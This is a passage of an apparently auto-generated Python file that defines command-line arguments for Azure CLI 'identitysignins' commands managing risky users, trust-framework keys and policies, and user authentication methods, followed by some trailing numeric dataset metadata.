'Possible values are: true, false')
c.argument('is_processing', arg_type=get_three_state_flag(), help='Indicates wehther a user\'s risky state is '
'being processed by the backend')
c.argument('risk_detail', arg_type=get_enum_type(['none', 'adminGeneratedTemporaryPassword',
'userPerformedSecuredPasswordChange',
'userPerformedSecuredPasswordReset',
'adminConfirmedSigninSafe', 'aiConfirmedSigninSafe',
'userPassedMFADrivenByRiskBasedPolicy',
'adminDismissedAllRiskForUser',
'adminConfirmedSigninCompromised', 'hidden',
'adminConfirmedUserCompromised', 'unknownFutureValue']),
help='')
c.argument('risk_last_updated_date_time', help='The date and time that the risky user was last updated.')
c.argument('risk_level', arg_type=get_enum_type(['low', 'medium', 'high', 'hidden', 'none',
'unknownFutureValue']), help='')
c.argument('risk_state', arg_type=get_enum_type(['none', 'confirmedSafe', 'remediated', 'dismissed', 'atRisk',
'confirmedCompromised', 'unknownFutureValue']), help='')
c.argument('user_display_name', type=str, help='Risky user display name.')
c.argument('user_principal_name', type=str, help='Risky user principal name.')
c.argument('history', type=validate_file_or_dict, help='The activity related to user risk level change '
'Expected value: json-string/@json-file.')
with self.argument_context('identitysignins risky-user confirm-compromised') as c:
c.argument('user_ids', nargs='+', help='')
with self.argument_context('identitysignins risky-user create-history') as c:
c.argument('risky_user_id', type=str, help='key: id of riskyUser')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('is_deleted', arg_type=get_three_state_flag(), help='Indicates whether the user is deleted. '
'Possible values are: true, false')
c.argument('is_processing', arg_type=get_three_state_flag(), help='Indicates wehther a user\'s risky state is '
'being processed by the backend')
c.argument('risk_detail', arg_type=get_enum_type(['none', 'adminGeneratedTemporaryPassword',
'userPerformedSecuredPasswordChange',
'userPerformedSecuredPasswordReset',
'adminConfirmedSigninSafe', 'aiConfirmedSigninSafe',
'userPassedMFADrivenByRiskBasedPolicy',
'adminDismissedAllRiskForUser',
'adminConfirmedSigninCompromised', 'hidden',
'adminConfirmedUserCompromised', 'unknownFutureValue']),
help='')
c.argument('risk_last_updated_date_time', help='The date and time that the risky user was last updated.')
c.argument('risk_level', arg_type=get_enum_type(['low', 'medium', 'high', 'hidden', 'none',
'unknownFutureValue']), help='')
c.argument('risk_state', arg_type=get_enum_type(['none', 'confirmedSafe', 'remediated', 'dismissed', 'atRisk',
'confirmedCompromised', 'unknownFutureValue']), help='')
c.argument('user_display_name', type=str, help='Risky user display name.')
c.argument('user_principal_name', type=str, help='Risky user principal name.')
c.argument('history', type=validate_file_or_dict, help='The activity related to user risk level change '
'Expected value: json-string/@json-file.')
c.argument('activity', action=AddActivity, nargs='+', help='riskUserActivity')
c.argument('initiated_by', type=str, help='The id of actor that does the operation.')
c.argument('user_id', type=str, help='The id of the user.')
with self.argument_context('identitysignins risky-user delete-history') as c:
c.argument('risky_user_id', type=str, help='key: id of riskyUser')
c.argument('risky_user_history_item_id', type=str, help='key: id of riskyUserHistoryItem')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins risky-user dismiss') as c:
c.argument('user_ids', nargs='+', help='')
with self.argument_context('identitysignins risky-user list-history') as c:
c.argument('risky_user_id', type=str, help='key: id of riskyUser')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins risky-user show-history') as c:
c.argument('risky_user_id', type=str, help='key: id of riskyUser')
c.argument('risky_user_history_item_id', type=str, help='key: id of riskyUserHistoryItem')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins risky-user update-history') as c:
c.argument('risky_user_id', type=str, help='key: id of riskyUser')
c.argument('risky_user_history_item_id', type=str, help='key: id of riskyUserHistoryItem')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('is_deleted', arg_type=get_three_state_flag(), help='Indicates whether the user is deleted. '
'Possible values are: true, false')
c.argument('is_processing', arg_type=get_three_state_flag(), help='Indicates wehther a user\'s risky state is '
'being processed by the backend')
c.argument('risk_detail', arg_type=get_enum_type(['none', 'adminGeneratedTemporaryPassword',
'userPerformedSecuredPasswordChange',
'userPerformedSecuredPasswordReset',
'adminConfirmedSigninSafe', 'aiConfirmedSigninSafe',
'userPassedMFADrivenByRiskBasedPolicy',
'adminDismissedAllRiskForUser',
'adminConfirmedSigninCompromised', 'hidden',
'adminConfirmedUserCompromised', 'unknownFutureValue']),
help='')
c.argument('risk_last_updated_date_time', help='The date and time that the risky user was last updated.')
c.argument('risk_level', arg_type=get_enum_type(['low', 'medium', 'high', 'hidden', 'none',
'unknownFutureValue']), help='')
c.argument('risk_state', arg_type=get_enum_type(['none', 'confirmedSafe', 'remediated', 'dismissed', 'atRisk',
'confirmedCompromised', 'unknownFutureValue']), help='')
c.argument('user_display_name', type=str, help='Risky user display name.')
c.argument('user_principal_name', type=str, help='Risky user principal name.')
c.argument('history', type=validate_file_or_dict, help='The activity related to user risk level change '
'Expected value: json-string/@json-file.')
c.argument('activity', action=AddActivity, nargs='+', help='riskUserActivity')
c.argument('initiated_by', type=str, help='The id of actor that does the operation.')
c.argument('user_id', type=str, help='The id of the user.')
with self.argument_context('identitysignins trust-framework-trust-framework show-trust-framework') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins trust-framework-trust-framework update-trust-framework') as c:
c.argument('key_sets', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.')
c.argument('policies', action=AddPolicies, nargs='+', help='')
with self.argument_context('identitysignins trust-framework create-key-set') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('keys', action=AddKeys, nargs='+', help='')
with self.argument_context('identitysignins trust-framework create-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins trust-framework delete-key-set') as c:
c.argument('trust_framework_key_set_id', type=str, help='key: id of trustFrameworkKeySet')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins trust-framework delete-policy') as c:
c.argument('trust_framework_policy_id', type=str, help='key: id of trustFrameworkPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins trust-framework list-key-set') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins trust-framework list-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins trust-framework set-policy-content') as c:
c.argument('trust_framework_policy_id', type=str, help='key: id of trustFrameworkPolicy')
c.argument('data', help='New media content.')
with self.argument_context('identitysignins trust-framework show-key-set') as c:
c.argument('trust_framework_key_set_id', type=str, help='key: id of trustFrameworkKeySet')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins trust-framework show-policy') as c:
c.argument('trust_framework_policy_id', type=str, help='key: id of trustFrameworkPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins trust-framework show-policy-content') as c:
c.argument('trust_framework_policy_id', type=str, help='key: id of trustFrameworkPolicy')
with self.argument_context('identitysignins trust-framework update-key-set') as c:
c.argument('trust_framework_key_set_id', type=str, help='key: id of trustFrameworkKeySet')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('keys', action=AddKeys, nargs='+', help='')
with self.argument_context('identitysignins trust-framework update-policy') as c:
c.argument('trust_framework_policy_id', type=str, help='key: id of trustFrameworkPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins trust-framework-key-set generate-key') as c:
c.argument('trust_framework_key_set_id', type=str, help='key: id of trustFrameworkKeySet')
c.argument('use', type=str, help='')
c.argument('kty', type=str, help='')
c.argument('nbf', type=int, help='')
c.argument('exp', type=int, help='')
with self.argument_context('identitysignins trust-framework-key-set show-active-key') as c:
c.argument('trust_framework_key_set_id', type=str, help='key: id of trustFrameworkKeySet')
with self.argument_context('identitysignins trust-framework-key-set upload-certificate') as c:
c.argument('trust_framework_key_set_id', type=str, help='key: id of trustFrameworkKeySet')
c.argument('key', type=str, help='')
with self.argument_context('identitysignins trust-framework-key-set upload-pkcs12') as c:
c.argument('trust_framework_key_set_id', type=str, help='key: id of trustFrameworkKeySet')
c.argument('key', type=str, help='')
c.argument('password', type=str, help='')
with self.argument_context('identitysignins trust-framework-key-set upload-secret') as c:
c.argument('trust_framework_key_set_id', type=str, help='key: id of trustFrameworkKeySet')
c.argument('use', type=str, help='')
c.argument('k', type=str, help='')
c.argument('nbf', type=int, help='')
c.argument('exp', type=int, help='')
with self.argument_context('identitysignins user delete-authentication') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user delete-information-protection') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user show-authentication') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user show-information-protection') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user update-authentication') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('email_methods', action=AddEmailMethods, nargs='+', help='')
c.argument('fido2_methods', action=AddFido2Methods, nargs='+', help='')
c.argument('methods', action=AddMethods, nargs='+', help='')
c.argument('microsoft_authenticator_methods', action=AddMicrosoftAuthenticatorMethods, nargs='+', help='')
c.argument('oath_methods', action=AddOathMethods, nargs='+', help='')
c.argument('operations', action=AddOperations, nargs='+', help='')
c.argument('passwordless_microsoft_authenticator_methods', action=AddPasswordlessMicrosoftAuthenticatorMethods,
nargs='+', help='')
c.argument('password_methods', action=AddPasswordMethods, nargs='+', help='')
c.argument('phone_methods', action=AddPhoneMethods, nargs='+', help='')
c.argument('security_question_methods', action=AddSecurityQuestionMethods, nargs='+', help='')
c.argument('temporary_access_pass_methods', action=AddTemporaryAccessPassMethods, nargs='+', help='')
with self.argument_context('identitysignins user update-information-protection') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('data_loss_prevention_policies', action=AddDataLossPreventionPolicies, nargs='+', help='')
c.argument('sensitivity_labels', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.')
c.argument('sensitivity_policy_settings', action=AddSensitivityPolicySettings, nargs='+',
help='sensitivityPolicySettings')
c.argument('threat_assessment_requests', type=validate_file_or_dict, help=' Expected value: '
'json-string/@json-file.')
c.argument('microsoft_graph_entity_id', type=str, help='Read-only.', arg_group='Policy')
c.argument('labels', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.',
arg_group='Policy')
with self.argument_context('identitysignins user-authentication create-email-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication create-fido2-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication create-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication create-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication create-oath-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication create-operation') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='')
c.argument('last_action_date_time', help='')
c.argument('resource_location', type=str, help='')
c.argument('status', arg_type=get_enum_type(['notstarted', 'running', 'succeeded', 'failed']), help='')
c.argument('status_detail', type=str, help='')
with self.argument_context('identitysignins user-authentication create-password-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('creation_date_time', help='')
c.argument('password', type=str, help='')
with self.argument_context('identitysignins user-authentication create-passwordless-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication create-phone-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('phone_number', type=str, help='')
c.argument('phone_type', arg_type=get_enum_type(['mobile', 'alternateMobile', 'office', 'unknownFutureValue']),
help='')
c.argument('sms_sign_in_state', arg_type=get_enum_type(['notSupported', 'notAllowedByPolicy', 'notEnabled',
'phoneNumberNotUnique', 'ready', 'notConfigured',
'unknownFutureValue']), help='')
with self.argument_context('identitysignins user-authentication create-security-question-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication create-temporary-access-pass-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication delete-email-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('email_authentication_method_id', type=str, help='key: id of emailAuthenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-fido2-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('fido2_authentication_method_id', type=str, help='key: id of fido2AuthenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('authentication_method_id', type=str, help='key: id of authenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('microsoft_authenticator_authentication_method_id', type=str, help='key: id of '
'microsoftAuthenticatorAuthenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-oath-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('software_oath_authentication_method_id', type=str, help='key: id of softwareOathAuthenticationMetho'
'd')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-operation') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('long_running_operation_id', type=str, help='key: id of longRunningOperation')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-password-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('password_authentication_method_id', type=str, help='key: id of passwordAuthenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-passwordless-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('passwordless_microsoft_authenticator_authentication_method_id', type=str, help='key: id of '
'passwordlessMicrosoftAuthenticatorAuthenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-phone-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('phone_authentication_method_id', type=str, help='key: id of phoneAuthenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-security-question-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('security_question_authentication_method_id', type=str, help='key: id of '
'securityQuestionAuthenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-temporary-access-pass-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('temporary_access_pass_authentication_method_id', type=str, help='key: id of '
'temporaryAccessPassAuthenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication list-email-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-fido2-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-oath-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-operation') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-password-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-passwordless-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-phone-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-security-question-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-temporary-access-pass-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-email-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('email_authentication_method_id', type=str, help='key: id of emailAuthenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-fido2-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('fido2_authentication_method_id', type=str, help='key: id of fido2AuthenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('authentication_method_id', type=str, help='key: id of authenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('microsoft_authenticator_authentication_method_id', type=str, help='key: id of '
'microsoftAuthenticatorAuthenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-oath-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('software_oath_authentication_method_id', type=str, help='key: id of softwareOathAuthenticationMetho'
'd')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-operation') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('long_running_operation_id', type=str, help='key: id of longRunningOperation')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-password-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('password_authentication_method_id', type=str, help='key: id of passwordAuthenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-passwordless-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('passwordless_microsoft_authenticator_authentication_method_id', type=str, help='key: id of '
'passwordlessMicrosoftAuthenticatorAuthenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-phone-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('phone_authentication_method_id', type=str, help='key: id of phoneAuthenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-security-question-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('security_question_authentication_method_id', type=str, help='key: id of '
'securityQuestionAuthenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-temporary-access-pass-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('temporary_access_pass_authentication_method_id', type=str, help='key: id of '
'temporaryAccessPassAuthenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication update-email-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('email_authentication_method_id', type=str, help='key: id of emailAuthenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication update-fido2-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('fido2_authentication_method_id', type=str, help='key: id of fido2AuthenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication update-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('authentication_method_id', type=str, help='key: id of authenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication update-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('microsoft_authenticator_authentication_method_id', type=str, help='key: id of '
'microsoftAuthenticatorAuthenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication update-oath-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('software_oath_authentication_method_id', type=str, help='key: id of softwareOathAuthenticationMetho'
'd')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication update-operation') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('long_running_operation_id', type=str, help='key: id of longRunningOperation')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='')
c.argument('last_action_date_time', help='')
c.argument('resource_location', type=str, help='')
c.argument('status', arg_type=get_enum_type(['notstarted', 'running', 'succeeded', 'failed']), help='')
c.argument('status_detail', type=str, help='')
with self.argument_context('identitysignins user-authentication update-password-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('password_authentication_method_id', type=str, help='key: id of passwordAuthenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('creation_date_time', help='')
c.argument('password', type=str, help='')
with self.argument_context('identitysignins user-authentication update-passwordless-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('passwordless_microsoft_authenticator_authentication_method_id', type=str, help='key: id of '
'passwordlessMicrosoftAuthenticatorAuthenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication update-phone-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('phone_authentication_method_id', type=str, help='key: id of phoneAuthenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('phone_number', type=str, help='')
c.argument('phone_type', arg_type=get_enum_type(['mobile', 'alternateMobile', 'office', 'unknownFutureValue']),
help='')
c.argument('sms_sign_in_state', arg_type=get_enum_type(['notSupported', 'notAllowedByPolicy', 'notEnabled',
'phoneNumberNotUnique', 'ready', 'notConfigured',
'unknownFutureValue']), help='')
with self.argument_context('identitysignins user-authentication update-security-question-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('security_question_authentication_method_id', type=str, help='key: id of '
'securityQuestionAuthenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication update-temporary-access-pass-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('temporary_access_pass_authentication_method_id', type=str, help='key: id of '
'temporaryAccessPassAuthenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
| 75.656306
| 137
| 0.654885
| 19,717
| 170,378
| 5.527464
| 0.039712
| 0.101243
| 0.055714
| 0.03984
| 0.963289
| 0.958912
| 0.953617
| 0.943901
| 0.93656
| 0.924971
| 0
| 0.003926
| 0.212187
| 170,378
| 2,251
| 138
| 75.689916
| 0.808025
| 0.003146
| 0
| 0.776989
| 0
| 0.019767
| 0.470026
| 0.13454
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000507
| false
| 0.033958
| 0.001521
| 0
| 0.002027
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
10720fa3acad439ed181b3a2ce2f9084c8a83584
| 358
|
py
|
Python
|
datasets/__init__.py
|
milesgray/CALAE
|
a2ab2f7d9ee17cc6c24ff6ac370b0373537079ac
|
[
"Apache-2.0"
] | null | null | null |
datasets/__init__.py
|
milesgray/CALAE
|
a2ab2f7d9ee17cc6c24ff6ac370b0373537079ac
|
[
"Apache-2.0"
] | null | null | null |
datasets/__init__.py
|
milesgray/CALAE
|
a2ab2f7d9ee17cc6c24ff6ac370b0373537079ac
|
[
"Apache-2.0"
] | null | null | null |
from .fractal import Fractal, FractalLabel, FractalLabelSR
from .fractal import FractalTUNITContrastive
from .fractal import make_fractal_alae_dataloader
from .fractal import make_fractal_clr_dataloader
from .fractal import make_fractal_clr_sr_dataloader
from .fractal import make_fractal_TUNIT_dataloader
from .celeba import CelebA, make_celeba_dataloader
| 39.777778
| 58
| 0.882682
| 46
| 358
| 6.543478
| 0.282609
| 0.219269
| 0.33887
| 0.27907
| 0.491694
| 0.398671
| 0.272425
| 0
| 0
| 0
| 0
| 0
| 0.089385
| 358
| 8
| 59
| 44.75
| 0.923313
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1075bb0449cf1a6c46737d4a477c5136cda10e14
| 41
|
py
|
Python
|
omw/blueprints/ili/__init__.py
|
tnaskret/OMW
|
93bc5df8b163a523dc09e6d8138df8807b1b2c02
|
[
"MIT"
] | null | null | null |
omw/blueprints/ili/__init__.py
|
tnaskret/OMW
|
93bc5df8b163a523dc09e6d8138df8807b1b2c02
|
[
"MIT"
] | null | null | null |
omw/blueprints/ili/__init__.py
|
tnaskret/OMW
|
93bc5df8b163a523dc09e6d8138df8807b1b2c02
|
[
"MIT"
] | null | null | null |
from omw.blueprints.ili.views import ili
| 20.5
| 40
| 0.829268
| 7
| 41
| 4.857143
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097561
| 41
| 1
| 41
| 41
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
1098f2d5c6b733d2d311ebfa12b07ca277c6c872
| 8,231
|
py
|
Python
|
zbpy/basicqueries.py
|
zetabase/zbpy
|
80a7d6bc150486e67f8dff2ae65aaab135d69c2f
|
[
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | null | null | null |
zbpy/basicqueries.py
|
zetabase/zbpy
|
